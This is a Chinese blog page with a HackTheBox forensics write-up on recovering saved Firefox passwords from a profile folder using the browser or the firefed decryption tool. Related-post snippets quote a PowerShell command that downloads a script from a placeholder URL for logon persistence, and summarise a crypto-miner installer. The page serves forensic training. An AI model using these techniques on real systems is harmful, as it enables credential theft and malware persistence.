HackTheBox-Forensic-Insider #Browser #Mozilla

已于 2023-12-16 09:51:44 修改
阅读量28 收藏
点赞数
文章标签: 服务器 运维
于 2023-12-05 22:20:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39974634/article/details/134818507
版权

给了一个压缩包,解压出来除了Firefox以外没有内容

将在这个文件夹中查找攻击者访问的内容,这个文件夹包含了火狐浏览器需要的设置和一些信息

为了排除干扰信息,建议在系统上新建一个账户,把该文件夹复制到c:\user\xxx\appdata\local\mozilla

我们启动火狐浏览器,就会自动读取目录下profile的信息

访问历史显示了攻击者登录了acc01的8080端口,可以看到攻击者访问了

password字段显示了flag

方法二

使用工具firefed,可以自动执行解密流程

login.json存储url、用户名、密码和其他元数据

key4.db保存了3DES的master key,可以对login.json的密码进行解密

只需输入profile路径,firefed可以自动进行解密        

行者孙Sun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HackTheBox-Forensic—Extraterrestrial Persistence #Linux
weixin_39974634的博客
12-05 37
WantedBy=multi-user.target #在multi-user.target启动时自动启动。[]是systemd的语法规定,用于规定节的开始和结束 一般都会有 关于服务的一般性描述和依赖关系。ExecStart=/usr/local/bin/service #服务开始时执行的命令。ExecStop=/usr/local/bin/service #服务停止时执行的命令。[Install] #定义服务与系统目标之间的关联以及启用或禁用服务时的行为。丢到hiencode解码。
HackTheBox-Forensic— Red Miners #Linux
weixin_39974634的博客
12-05 47
cronCleanUp 删除原有的计划任务,contab -l 可以列举 用sed去掉之后 crontab编辑 将修改内容保存。cleanEnv这个函数把环境中阻碍挖矿的进程杀掉,还会检查其他挖矿的行为,如果有的话也会杀掉。flag的四个部分通过搜索 == 或者"base64 -d"可以找到,经过拼接,得到最后的结果。给了一个miner.zip里面是一个installer_miner.sh的挖矿文件。
HackTheBox-Forensic— Illumination #Linux #Git
weixin_39974634的博客
12-05 138
从config变量可以看到,从config.json读取了文件,解析token后进行login操作。根据注释可见token已经被替换,因为不是base64,无法在开发/生产中正常工作。首先通过ls -la找到 .git 发现这是一个git repository。通过git show 加commit id可以看到变更记录。由于这是git库,可以通过过去的日志查看被替换之前的值。查看config.json文件。
HackTheBox-Forensic—Export #Windows #Volatility
weixin_39974634的博客
12-05 38
(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。先尝试pslist列出目标系统中的进程列表。
EnCase-Forensic取证软件完整版资料.ppt
11-14
EnCase-Forensic取证软件完整版资料 EnCase Forensic是Guidance Software公司开发的一款计算机取证软件,旨在提供计算机犯罪取证的全面解决方案。该软件提供实时预览、分析和获取,符合美国立法规范,全球最大的...
开源项目-esimov-forensic.zip
09-03
开源项目“esimov-forensic”是一个专门用于图像伪造检测的库,它为开发者和数字取证专家提供了强大的工具来鉴别图像的真伪。在现代数字时代,图像篡改技术日益普及,使得真实与虚假之间的界限变得模糊。这个库的...
Ubuntu-Forensic_linux_
09-30
Ubuntu operating system canconserve and manage a lot of configurationinformation and the information with forensicimportance
The Forensic Laboratory Handbook - Procedures and Practice
06-03
If the law has made you a witness, remain a man of science. You have no victim to avenge, no guilty or innocent person to convict or save— you must bear testimony within the limits of science.
Cuda-OpenCL-Forensic-Tools:使用图形卡进行取证处理
05-10
Cuda / OpenCL取证工具使用图形卡进行取证处理。 开发脚本以执行简单的取证功能,例如图像,覆盖,哈希和搜索。 该脚本的核心是Python Cuda / OpenCL。 最初的目标是测试该概念的性能。 如果性能显示出价值,那么下...
什么样的服务器是合乎直销网站标准
2301_78491269的博客
07-15 405
对于我们投资较少、刚刚起步的做网站直销公司来说,当然没有条件也没有必要来投资数千万、甚至数亿元来建立自己的数据中心,我们要做的就是选择一个合适的服务器租用商,租用他们优质的服务器,来保证发挥出该服务器的最大作用。工业设计包括了最基础的模块化和免螺丝设计,可以让运维人员实现免工具的快速拆装,以及可以有效防止和避免误操作的防呆设计等细节,此外机箱内的风道设计、散热效率、风扇与电源的配合、降噪与防震设计等等,都可以反映出厂家在相关技术及工业设计方面的实力高低。做网站直销选择租用服务器需要注意的几点要素。
搭建远程控制(远程桌面)服务器
07-16 437
搭建一个属于自己的远程控制服务器,操作简单,一次成功。服务端电脑不需要设置,只需要设置路由器或光猫的防火墙。客户端的安装很简单,设置按截图操作即可。
Cookies和session区别
最新发布
qq_39495959的博客
07-19 198
Cookies数据存储在客户端(浏览器)中,而Session数据存储在服务器端。这意味着Cookies是客户端技术,而Session是服务器端技术。
深入解析 Python 文件操作利器 —— shutil
阔码人生
07-16 520
shutil库作为 Python 文件操作的利器,为我们提供了丰富且强大的功能,从文件的复制、移动、重命名到文件的压缩与解压缩,无所不包。通过灵活运用shutil库,您可以高效地管理和操作文件,极大提升工作效率。希望本文能帮助您全面掌握shutil库的各种技巧,在实际应用中得心应手。
HP iLO5服务器硬件监控指标解读
MXsoft618的博客
07-17 603
监控易作为一款专业的监控软件,通过支持HP iLO5接口,为运维团队提供了全面的服务器硬件监控解决方案。本文将针对监控易中针对HP iLO5的监控指标进行解读,帮助运维团队更好地理解和应用这些监控功能。通过集成多种监控技术和协议,监控易能够实时收集和分析IT系统的运行状态和性能指标,帮助运维团队及时发现潜在问题并进行处理。通过监控易软件的支持,运维团队可以实时掌握服务器的运行状态和性能表现,及时发现潜在问题并进行处理。因此,对于需要全面、高效监控HP服务器的运维团队来说,监控易无疑是一个值得推荐的选择。
Windows 系统利用 SSH 和 WSL2 子系统当服务器
clearloveTIM的博客
07-16 710
利用 SSH 和 WSL2 将 Windows 系统主机当成 Linux 服务器,解决 WSL2 的联网问题,conda 的 CondaHTTPError等,termius, pycharm 可连接,无痛使用。
服务器IP和电脑IP有什么不同
hgdlip的博客
07-17 399
服务器IP和电脑ip有什么不同?在当今的信息化时代,IP地址作为网络世界中不可或缺的元素,扮演着举足轻重的角色。然而,对于非专业人士来说,服务器IP和电脑IP之间的区别往往模糊不清。本文旨在深入探讨这两者之间的不同,帮助读者更好地理解和应用它们。
什么是网络存储服务器
athena1999的博客
07-16 334
网络存储器就像一台只有存储功能的终端,独立地工作,里面带有固定的系统,但可以自己设置部分参数功能,可以接入服务器或者电脑进行设置,网络存储服务器实际上就是精简的、小型化的服务器,同样由主板、芯片级系统、内存、网络芯片等组成•虽然它是从服务器的基础上简化而来,但功能依然强大,不但可以用来 做服务服务器和文 件服务器,还具有完善的数据备份、网络打印机共享、用户/用户群管理功能,还可以自动下载。存储服务器通常是独立的单元。存储服务器通常是单机运做的,不会与其他服务器连接,而多功能的服务器一般会连接到磁盘阵列上。
第一节Linux常见指令
2202_75331338的博客
07-15 1165
tail命令从指定点开始将文件写到标准输出,使用tail命令的 -f 选项可以方便的查阅正在改变的日志文件,tail -f filename 会把 filename 里最尾部的内容显示在屏幕上,并且不但刷新,使你看到最新的文件内容。说明:cp指令用于复制文件或目录,如同时指定两个以上的文件或目录,且最后的目的地是一个已经存在的目录,则它会把前面指定的所有文件或目录复制到此目录中,若同时指定多个文件或目录,而最后的目的地并非一个已存在的目录,则会出现错误信息。公历是选择国际通用的历法,又称格列历,通称阳历。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值